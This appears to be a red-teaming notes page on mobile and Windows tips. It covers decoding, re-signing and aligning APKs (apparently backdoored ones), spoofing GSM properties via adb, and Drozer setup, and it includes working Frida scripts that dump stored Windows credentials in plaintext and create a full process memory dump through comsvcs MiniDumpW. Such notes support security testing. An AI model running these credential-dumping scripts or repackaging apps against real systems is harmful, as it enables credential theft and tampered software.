Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Getting certificate details from an apk
  • apktool - decode and compile APK
  • Create keystore key
  • Sign apk with jarsigner
  • Align APK to avoid errors
  • Execute target activity via ADB
  • Add GSM
  • Frida enumerate users creds (Windows)
  • Frida minidump - Windows
  • Drozer: Android App enumeration

Was this helpful?

  1. Mobile

Basic tips

Getting certificate details from an apk

Getting certificate details from an apkkeytool -printcert -jarfile file.apk

apktool - decode and compile APK

java -jar .\apktool.jar decode -r 'C:\tmp\xxxxx.apk'

(inside the decompiled APK (root))
java -jar ..\apktool.jar build -o c:\tmp\new.apk C:\Tools\android\apk_folder

I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Copying libs... (/kotlin)
I: Copying libs... (/META-INF/services)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
PS C:\Tools\android\>

Create keystore key

 cd C:\Program Files\Java\jre1.8.0_251\bin
 keytool.exe -genkey -v -keystore c:\tmp\.keystore -keyalg RSA -keysize 2040 -validity 365 -alias baws
 
 (...)
 Generating 2,040 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 days
        for: CN=123, OU=123, O=123, L=123, ST=123, C=123
[Storing c:\tmp\.keystore]

Sign apk with jarsigner

Here, you need to use the alias created when you created the keystore file (baws, in this case).

cd C:\Program Files\AdoptOpenJDK\jdk-11.0.11.9-hotspot\bin
jarsigner.exe -sigalg SHA1withRSA -digestalg SHA1 c:\tmp\new.apk baws -keystore C:\tmp\.keystore

(...)
Enter Passphrase for keystore:
jar signed.

Warning:
The signer's certificate is self-signed.

Align APK to avoid errors

After sign an APK, if you got some erros such as "Failed to extract native libraries, res=-2]", probably you need to align the APK.

.\adb.exe install C:\tmp\backdored.apk
Performing Streamed Install
adb: failed to install C:\tmp\backdored.apk: Failure [INSTALL_FAILED_INVALID_APK: Failed to extract native libraries, res=-2]

Attention: You must use zipalign at one of two specific points in the app building process, depending on the app signing tool you use:

  • If you use apksigner, only run zipalign before signing the apk file. If you sign your APK using apksigner and make other changes to the APK, the signature will be invalidated.

  • If you use jarsigner, only run zipalign after signing the APK file.

As I used jarsigner, my last step is align the APK before installing it.

zipalign -p -f -v 4 backdored.apk backdored-aligned.apk

--now--
.\adb.exe install C:\tmp\backdored.apk

Execute target activity via ADB

First, check on the Android-Manifest.xml file the package name. It can be found on the first line of the XML file (<?xml version="1.0" encoding="utf-8" standalone="no" ... package="com.x.x.x.x" ...)

 .\adb.exe shell am start com.xxx.xxx.xxx/com.xxx.xxx.v2.ui.dashboard.DashboardActivity

Add GSM

adb shell
setprop gsm.operator.numeric 64304
setprop gsm.sim.operator.numeric 64304
setprop gsm.sim.operator.alpha target
setprop gsm.operator.alpha target
setprop gsm.sim.operator.iso-country us
setprop gsm.operator.iso-country us

--validate--
getprop |grep gsm

Frida enumerate users creds (Windows)

function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateW");
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
    const count = Memory.alloc(8);
    const pCredentials = Memory.alloc(8);
    const ret = CredEnumerate(NULL, 0, count, pCredentials);
    if(ret){
        console.log("Enumerate complete! Found " + count.readInt() + " entries.");

        for(var i=0; i<count.readInt(); i++){
            const curr = pCredentials.add(i*8).readPointer();
            console.log(curr.readByteArray(256));
        }

    }
}


[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 1 entries.
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  18 41 e0 1c 37 02 00 00 00 00 00 00 02 00 00 00  .A..7...........
00000010  70 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00  pA..7...........
00000020  a8 78 32 15 34 6c d7 01 00 00 00 00 00 00 00 00  .x2.4l..........
00000030  00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00  ................
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000050  7e 41 e0 1c 37 02 00 00 00 00 00 00 00 00 00 00  ~A..7...........
00000060  74 00 65 00 73 00 74 00 65 00 31 00 00 00 75 00  t.e.s.t.e.1...u.
00000070  73 00 65 00 72 00 31 00 00 00 00 00 00 00 00 00  s.e.r.1.........
00000080  00 00 00 00 00 00 00 00 1e 88 b1 e6 00 12 00 80  ................
00000090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000c0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000f0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................


---2nd example---
[Remote::c:\windows\system32\cmd.exe]-> EnumerateGenericCredentials()
Enumerate complete! Found 2 entries. pCredentials=0x1f3e83c2470
Credentials at 0x1f3e6184310 ret: 0x1
teste1:user1:null
Credentials at 0x1f3e6184378 ret: 0x1
teste2:user2:pass2
---------------------------------------------
function EnumerateGenericCredentials(credname){
    const CredEnumerate_ptr = Module.getExportByName("advapi32", "CredEnumerateA");
    const CredEnumerate = new NativeFunction(CredEnumerate_ptr, "pointer", ["pointer", "int", "pointer", "pointer"])
    const count = Memory.alloc(Process.pointerSize);
    const pCredentials = Memory.alloc(256);
    const ret = CredEnumerate(NULL, 0, count, pCredentials);
    if(ret){
        console.log("Enumerate complete! Found " + count.readInt() + " entries. pCredentials="+pCredentials);

        for(var i=0; i<count.readInt(); i++){
            const curr = pCredentials.readPointer().add(i * Process.pointerSize).readPointer();//.add(Process.pointerSize*2); 
            
            console.log("Credentials at " + curr + " ret: " + ret);
                const targetname = curr.add(8).readPointer().readAnsiString();
                const size = curr.add(32).readU32();
                const blob = curr.add(40).readPointer();
                const username = curr.add(72).readPointer().readAnsiString();
                const password = blob.readUtf16String();
            console.log(targetname + ":" + username + ":" + password);
        }
    }else{
        console.log("ret is false!");
    }
}

--3rd example---
[Remote::c:\windows\system32\cmd.exe]-> GetGenericCredentials("teste2")
CredReadA is 0x7ffdd7e44e90
Credentials at 0x1f3e83c23e0 ret: 0x1
user2:pass2

Frida minidump - Windows

function MiniDump(pid, dumpname){
    const LoadLibraryW_ptr = Module.getExportByName("kernel32", "LoadLibraryW");
    const LoadLibraryW = new NativeFunction(LoadLibraryW_ptr, "int", ["pointer"]);
    LoadLibraryW(Memory.allocUtf16String("comsvcs.dll"));

    const MiniDumpW_ptr = Module.getExportByName("comsvcs", "MiniDumpW");
    const MiniDumpW = new NativeFunction(MiniDumpW_ptr, "int", ["uint32", "uint32", "pointer"]);
    
    const cmd = pid + " " + dumpname + " full";
    console.log("Running MiniDump(" + cmd + ")");
    MiniDumpW(0, 0, Memory.allocUtf16String(cmd));
}

[Remote::c:\windows\system32\cmd.exe]-> MiniDump(108, "c:\\Users\\user\\Desktop\\dump.asd")

Drozer: Android App enumeration

adb install drozer-agent-2.x.x.apk
drozer console connect --server 192.168.0.10

Basic commands below:

PreviousBackdooring/patch APKsNextResources

Last updated 3 years ago

Was this helpful?

Next, pick a target activity, and add the android:name="com.x.x.com.x..v2.ui.dashboard.DashboardActivity"> ..

😇
LogoRelease Frida 14.2.18 · frida/fridaGitHub
LogoDrozer TutorialHackTricks